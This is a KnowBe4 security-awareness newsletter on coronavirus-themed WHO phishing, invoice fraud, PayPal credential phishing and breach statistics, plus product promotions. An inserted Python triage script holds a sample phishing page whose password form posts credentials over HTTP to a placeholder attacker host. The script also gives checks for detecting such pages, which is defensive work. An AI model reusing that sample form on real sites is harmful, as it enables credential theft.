CyberheistNews Vol 10 #8 [Heads-up] The World Health Organization Warns of New Coronavirus Phishing Attacks. Inoculate Your Employees!


The World Health Organization (WHO) is putting out an alert about ongoing Coronavirus-themed phishing attacks that impersonate the WHO and try to steal confidential information and deliver malware. This is exactly what we predicted.

"Criminals are disguising themselves as WHO to steal money or sensitive information," the United Nations agency says in the Coronavirus scam alert.

"WHO is aware of suspicious email messages attempting to take advantage of the 2019 novel coronavirus emergency."

The phishing messages are camouflaged to appear as being sent by WHO officials and ask the targets to share sensitive info like usernames and passwords, redirect them to a phishing landing page via malicious links embedded in the emails, or ask them to open malicious attachments containing malware payloads. "If you are contacted by a person or organization that appears to be from WHO, verify their authenticity before responding," says the WHO.

WHO phishing campaign

An example of such a phishing campaign using COVID-19 as bait and asking potential victims to "go through the attached document on safety measures regarding the spreading of coronavirus" was spotted by the Sophos Security Team earlier this month.

They were also asked to download the attachment to their computer by clicking on a "Safety Measures" button that would instead redirect them to a compromised site the attackers use as a phishing landing page.

This phishing page loads the WHO website in a frame in the background and displays a pop-up in the foreground asking the targets to verify their e-mail.

Once they type in their usernames and passwords and click the "Verify" button, their credentials are exfiltrated to a server controlled by the attackers over an unencrypted HTTP connection, and they are then redirected to WHO's official website — not that the phishers would care about their victims' data security.
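The two traits described above (the real brand site framed as a backdrop, and a credential form posting over plain HTTP to an attacker host) can be checked mechanically on a saved copy of a suspicious page. The following is an added example for analysts, not code from the newsletter, Sophos or WHO; the page URL, the HTML and the hostnames `compromised-site.example` and `collector.example` are constructed placeholders.

```python
"""Heuristic triage of a captured credential-phishing page (added example).

Flags the traits described in the article: the page embeds the impersonated
brand's real site in an iframe, and its login form posts credentials over
unencrypted HTTP to a host that is not the page's own.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: a phishing page as an analyst might save it. Hostnames are placeholders.
PAGE_URL = "https://compromised-site.example/verify/index.html"
SAMPLE_HTML = """
<html><body>
<iframe src="https://www.who.int/" style="width:100%;height:100%"></iframe>
<div class="popup">
  <form method="post" action="http://collector.example/post.php">
    Verify your e-mail to continue
    <input type="text" name="email">
    <input type="password" name="password">
    <button type="submit">Verify</button>
  </form>
</div>
</body></html>
"""


class _Collector(HTMLParser):
    """Collects iframe sources and forms, noting whether each form has a password field."""

    def __init__(self):
        super().__init__()
        self.iframes = []
        self.forms = []          # dicts: {"action": str, "has_password": bool}
        self._current = None     # form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe" and a.get("src"):
            self.iframes.append(a["src"])
        elif tag == "form":
            self._current = {"action": a.get("action", ""), "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if a.get("type", "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def triage(page_url, html):
    """Return a list of human-readable findings explaining why the page looks like a credential phish."""
    c = _Collector()
    c.feed(html)
    page_host = urlparse(page_url).hostname or ""
    findings = []
    # Trait 1: a legitimate third-party site framed behind the pop-up.
    for src in c.iframes:
        host = urlparse(src).hostname or ""
        if host and host != page_host:
            findings.append(f"frames third-party site {host} as a backdrop")
    # Trait 2: a password form whose action is plain HTTP and/or off-site.
    for f in c.forms:
        if not f["has_password"]:
            continue
        action = urlparse(f["action"])
        if action.scheme == "http":
            findings.append(f"password form posts over unencrypted HTTP to {action.hostname}")
        if action.hostname and action.hostname != page_host:
            findings.append(f"password form posts to off-site host {action.hostname}")
    return findings


if __name__ == "__main__":
    for line in triage(PAGE_URL, SAMPLE_HTML):
        print("-", line)
```

The frame-as-backdrop trick only works if the impersonated site allows itself to be framed; a site can refuse that with a `Content-Security-Policy: frame-ancestors 'none'` response header (or the older `X-Frame-Options: DENY`), which is a cheap mitigation for any brand that phishers like to imitate.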

If you have not done this yet, I would send your employees, friends and family something like the following. Feel free to copy/paste/edit.

"The worldwide spread of the new Coronavirus is being used by bad guys to scare people into clicking on links, opening malicious attachments, or giving out confidential information. Be careful with anything related to the Coronavirus: emails, attachments, any social media, texts on your phone, anything. Look out for topics like:
  • Check updated Coronavirus map in your city
  • Coronavirus Infection warning from local school district
  • CDC or World Health Organization emails or social media Coronavirus messaging
  • Keeping your children safe from Coronavirus
  • You might even get a scam phone call to raise funds for "victims".
There will be a number of scams related to this, so please remember to Think Before You Click!"

For KnowBe4 customers, you can find a Coronavirus-themed simulated phishing template in the Current Events category. I suggest you send it to your employees and friends/family more or less immediately. More:

[Alert] It Only Takes One Phish: Puerto Rico Gets Scammed Out of $2.6 Million

Once again, it was the human factor and skilled phishing tactics from the bad guys that was responsible for such a material loss. And, from the sound of it, policy and procedure either weren’t in place or weren’t followed.

This is a very simple tale; in fact, it is so simple that it sounds like all the attackers used was a single email. According to news reports, one of the agencies of the Puerto Rican government, the Industrial Development Company, transferred the millions on January 17th after receiving a simple email purporting to be from a contractor and requesting a change to the banking details used for payment remittance.

The FBI’s Recovery Asset Team is now involved and is working to attempt to recover the funds.

Anytime emails are sent asking for any kind of information or changes made involving bank accounts, transactions, and transfers, organizations need to protect themselves proactively.

Establish a policy that mandates all requests be validated using an alternative medium, such as in-person or over the phone. Users whose roles have them even marginally involved with money-related transactions should step through security awareness training to both understand that these types of scams occur regularly and how they can spot a suspicious email before the damage is done. More:

See the New Season 2 of This Netflix-Style Video Series From KnowBe4 - 'The Inside Man'

We’re excited to announce Season 2 of the award-winning KnowBe4 Original Series - ‘The Inside Man’. This network-quality video training series delivers an entertaining learning experience that ties security awareness principles from each episode to key cybersecurity best practices. From social engineering, insider threats and passwords, to third-party apps and AI, ‘The Inside Man’ teaches your users real-world application that makes learning how to make smarter security decisions fun and engaging.

The Story so Far...

Six months after his transformation from undercover hacker to company defender, Mark our flawed hero from Season 1, struggles to keep his past a secret as he protects the company’s latest acquisition from a new nemesis, while at the same time navigating a budding romance.

With his personal and professional lives increasingly intertwined, becoming a White Hat might just have been the easy part…

Watch ‘The Inside Man’ Season 2 trailer and one episode to see how entertaining security awareness training can be!

IBM: "Phishing *Remains* the Most Frequent Initial Attack Vector of Successful Criminal Hacks"

With cybercriminals always looking for the most successful way to carry out a successful attack, phishing once again proves to be the most adaptable and viable attack vector.

Over the years, attackers have looked for new ways to gain access to an organization’s network. Years ago, it was SQL Injection attacks. More recently the industry has been plagued with remote desktop-based attacks. But throughout the years, one attack vector has remained near or at the top of the list: phishing.

It just makes sense – an email-based phishing attack gives the cybercriminal a foothold inside your corporate network, provided it gets a chance to execute… IF the phishing scam is good enough to fool the email recipient – your user.

According to the X-Force Threat Intelligence Index 2020, produced by IBM X-Force Incident Response and Intelligence Services (IRIS), phishing is still the number one attack vector in use today.

In a close race, phishing just edges out scanning for and exploiting vulns and unauthorized use of credentials. IBM X-Force also notes that phishing – representing the attack vector used in 31 percent of attacks – is, technically, down from 44 percent in 2018. Even so, first place is first place. And that means it’s a clear indicator where organizations today need to place a cybersecurity focus.

You can put email scanning, DNS lookups, and endpoint-based antivirus in place, but the most mature security models understand – and, frankly, expect – some measure of phishing emails will still make it past layered security controls.

Phishing Isn’t Going Anywhere

And so, new-school security awareness training needs to be added to your layered security strategy, leveraging the user as an additional security measure. When users are educated on what phishing attacks look like, they can more easily spot scams without putting your organization at risk by engaging with email-based malicious content.

[Live Demo] Identify and Respond to Email Threats Faster With PhishER

Your users are likely already reporting potentially dangerous emails in some fashion within your organization. The increase of this email traffic can present a new problem!

With only approximately 1 in 10 user-reported emails being verified as actually malicious, how do you handle the real phishing attacks and email threats – and, just as importantly, effectively manage the other 90% of user-reported messages accurately and efficiently?

Now you can with PhishER, a product which allows your Incident Response team to quickly identify and respond to email threats faster. This will save them so much time!

See how you can best manage your user-reported messages.

Join us TOMORROW, February 19 @ 2:00 pm (ET) for a live 30-minute demonstration of the PhishER platform. With PhishER you can:
  • Cut through your Incident Response inbox noise and respond to the most dangerous threats more quickly
  • Automate message prioritization by rules you set into one of three categories: Clean, Spam or Threat
  • Augment your analysis and prioritization of user-reported messages with PhishML, PhishER’s new machine-learning module
  • See clusters of messages to identify a potential phishing attack against your organization
  • Meet critical SLAs within your organization to process and prioritize threats and legitimate emails
  • Easy integration with KnowBe4’s email add-in button, Phish Alert, or forwarding to a mailbox works too!
Find out how adding PhishER can be a huge time-saver for your Incident Response team!

Date/Time: TOMORROW, February 19 @ 2:00 (ET)

Save My Spot!

New PayPal Phishing Attack Steals Confidential Data Like Your Passport and Social Security Number

An ongoing PayPal phishing campaign is trying to steal a wide range of personal information, including Social Security numbers and passport photos, Threatpost reports. The scams were discovered by Czech IT company ALEF NULA, which noted that the scam is notable for the breadth of data it requests.

The phishing messages inform the recipient that their PayPal account has been locked because a new device logged into it. The recipient is asked to log in to their account and update their info. The link in the message is a URL that redirects the user to the phishing site.

The first two pages on the phishing site are standard forms asking for users’ names, addresses, phone numbers, and payment card details. The next page asks for the user’s date of birth and Social Security number, and the final page tells them to upload a photo of their passport.

Jan Kopriva at ALEF NULA explained that this is a common strategy in modern phishing scams. “Over the years, phishing authors seem to have learned that once they hook a phish, they should try to get all the information they can from them,” Kopriva said. “This is the reason why many current campaigns don’t stop after getting the usual credit card information, but go further.”

Kopriva also noted that the way the page is laid out might compel users to upload even more information than the attackers are after.

“What might be a bit unfortunate from the standpoint of a potential victim is that after the user uploads a file, the page is refreshed but no confirmation is displayed,” Kopriva said. “This means that a less vigilant user might upload multiple photos of documents while thinking that their previous attempts were invalid for some reason.”

This campaign can be easily avoided by someone who knows what to look for. The initial email contains numerous grammatical errors, and the URL of the phishing site doesn’t even attempt to spoof PayPal’s real address. New-school security awareness training can help your employees recognize these types of irregularities. Threatpost has the story:

[NEW WEBINAR] Addressing the Challenge of Third-Party Vendor Risk: Securing Your Supply Chain

Your customer data, intellectual property, and financials are the lifeblood of your organization. If lost or leaked, there could be significant implications to the viability of your business. Maintaining control of that data, especially with third-party services, can be extremely challenging and requires that you ask the right questions and enforce stringent security policies.

In an environment of increased outsourcing, cloud computing adoption, and regulatory requirements, how do you manage vendor risk and ensure you have a consistent evaluation life cycle?

Join James McQuiggan, KnowBe4’s Security Awareness Advocate, to get actionable steps you can use now to better manage your third-party vendor risk.

You’ll learn:
  • The importance of securing your organization’s critical data
  • How to determine Supplier Security Proficiency
  • Why it’s important to understand the source of third-party products
  • The impact Vendor Questionnaires have on your Security Posture
  • How leveraging a GRC platform can ease the burden of risk assessments and audits
Date/Time: Wednesday, February 26 @ 2 PM (ET)

Save My Spot!

Let's stay safe out there.

Warm Regards,
Stu Sjouwerman
Founder and CEO
KnowBe4, Inc

PS, We're excited to roll out the new ModStore and the KnowBe4 2020 versions of our flagship KMSAT training modules. Check them out here!

Quotes of the Week
"Patience is the companion of wisdom." - Augustine of Hippo (354 – 430)

"Never believe that a few caring people can't change the world.
For, indeed, that's all who ever have."

- Margaret Mead - Anthropologist (1901 - 1978)

Thanks for reading CyberheistNews

Security News
Most British Data Breaches Traced to Human Error

90% of data breaches in the UK during 2019 were caused by human mistakes, Infosecurity Magazine reports. CybSafe analyzed all the data breach reports received by the UK Information Commissioner’s Office (ICO) last year and found that human error was responsible for nine out of ten of these incidents.

45% of the 2,376 breaches involved users falling for phishing attacks, while unauthorized access made up 33% of the incidents. 10% of the attacks involved the use of ransomware or some other type of malware, and just 2.7% were traced to hardware or software misconfigurations.

In addition, CybSafe found that the number of breaches caused by human error has been increasing, rising from 87% in 2018.

Oz Alashe, CEO of CybSafe, stated that the human element is one of the most important security issues to address, since social engineering is much easier, cheaper, and more effective than purely technical hacking.

“As this analysis shows, it’s almost always human error that enables attackers to access encrypted channels and sensitive information,” Alashe said. “Staff can make a variety of mistakes that put their company’s data or systems at risk, often because they lack the knowledge or motivation to act securely, or simply because they accidentally slip up.”

Alashe emphasized, however, that while employees are the source of this problem, they’re also the solution. “Employees of course pose a certain level of cyber-risk to their employers, as seen in our findings thus far,” Alashe said.

“Nevertheless, people also have an important role to play in helping to protect the companies they work for, and human cyber-risk can almost always be significantly reduced by encouraging changes in staff cyber-awareness, behavior and culture.” Infosecurity Magazine has the story:

Education Is Necessary to Stay Ahead of Threats

Most people don’t realize how vulnerable they are to social engineering until they experience it, according to Anna Collard, the founder of KnowBe4’s South African security awareness company Popcorn Training.

Collard joined the CyberWire’s Hacking Humans podcast to discuss the results of a survey of Africans concerning cyber awareness. Collard stressed that Africa is quickly becoming a major target for scammers since so many Africans are coming online for the first time.

Collard said one of the findings of the survey that struck her the most was how many people thought they knew more than they actually did.

“I find personally, what is most interesting in the results that this report showed was that you also get quite a large percentage of people that think they are sort of equipped or that they know what to do, but they actually don't,” Collard said.

“So, that's that whole concept of unconscious incompetence – you know, that quadrant where you kind of, you know what you don't know, but then you don't know you don't know. And that's a massive problem because you have people that think, well, everything's fine. And they aren't even aware of the problem itself or that they should educate themselves a bit more.”

Collard pointed to one example of this, where the survey found that most respondents felt they’d received sufficient training, but more than half didn’t know about some basic security threats and best practices.

“But the people that responded, they said that about 60% felt the employers have done enough to, you know, raise awareness,” she said. “But in the same token, 65% didn't know what ransomware was. More than 50% had no idea what multi-factor authentication is or how you would use that.”

Collard added this type of unawareness is a universal issue that affects people around the world. “And that's not just African problems – it's worldwide, right?” she continued. “The rise in social engineering and phishing attacks and ransomware schemes. The need to put something as basic as two-factor authentication in place, especially if you do financial transactions on your mobile devices – it's so important.

Yeah, and people just, you know, they think they know, but at the same time, when you ask those sort of qualifying questions, they didn't.” The CyberWire has the story:

What KnowBe4 Customers Say

A customer in Australia provided answers to a reference check:

On what basis did you select KnowBe4, how does it compare to the other market leaders?

"Decision based on extensive local and global review of current market providers. Current features, innovation, customer experience and support. My key needs were a) an all rounded provider (rather than a niche service provider); b) competitive rate; c) ability to extend offerings to upskill our new Ambassador program; d) ongoing innovation. The material provided in the Gartner Magic Quadrant report further supported my decision:"

In your opinion, why does KnowBe4 provide a superior product offering

"The pre- and post-sales support is exceptional. Flawless execution and commitment to customer needs. We continue to learn the nuances of the platform but the KnowBe4 service team (Jeff) is outstanding and extremely responsive. The platform is comprehensive, has great reporting options and great value adds – Personal Risk Score assessment and training modules for repeated phishing user failures, extensive library of messages, webinars (also open to our Ambassadors)"

Any other insights?

"The KnowBe4 team offer far more than just a platform. We had the opportunity to participate in a guest speaker forum that was made open to our Ambassadors and staff. This is an invaluable ‘value add’ when you have a limited budget to work with. They also offer a strategic consulting to support niche campaigns to target markets and have an internal resource to support education in the workplace.

Prior to signing with KnowBe4 we had a barrage of providers knocking on our door. The majority of offerings were equal on price but were a poor 2nd in terms of the full suite of capability on offer.

I would highly recommend KnowBe4 to any Australian organisation looking to progress their Change and Awareness program using a leading-edge platform and best in class service support."

"Hi Stu, I read your article on Having worked in an established corporate environment and in a startup company as a software developer for many years before I landed here, I think it’s great that you give credit to the team that you have built, but I know that your direction and philosophy and dream have a lot to do with that also.

I can tell you that EVERYONE I have ever talked to or met at KnowBe4 has been so positive and helpful and wonderful to work with. EVERYONE, I’m serious. Usually there’s a grouch or arrogant/egotistical personality somewhere but apparently not at KnowBe4. After reading your article, I can see why. You have everything together there. Congratulations to you for putting together such a unique company, and every day I am glad that we were able to find you when we did."
- B.G., IT Staff

The 10 Interesting News Items This Week
    1. "The intelligence coup of the century" Interesting story, 10-minute read for a break!

    2. DOJ charges four Chinese military hackers for Equifax hack:

    3. FBI Arrests Former MSP Employee for Peddling Cloud Server Admin Access:

    4. Apple Security Shock As Mac Threats Outpace Microsoft Windows By 2 To 1:

    5. Welcome to the era of Ransomware 2.0:

    6. Forget Hacks... Ransomware, Phishing Are Election Year's Real Threats:

    7. Scammers are trying to exploit coronavirus concerns to breach companies:

    8. US government goes all in to expose new malware used by North Korean hackers:

    9. Bill Offers $400M for State, Local Government Cybersecurity:

    10. A new station is on the air: CYBERCRIME RADIO is launching:

Cyberheist 'Fave' Links
This Week's Links We Like, Tips, Hints and Fun Stuff

Copyright © 2014-2020 KnowBe4, Inc. All rights reserved.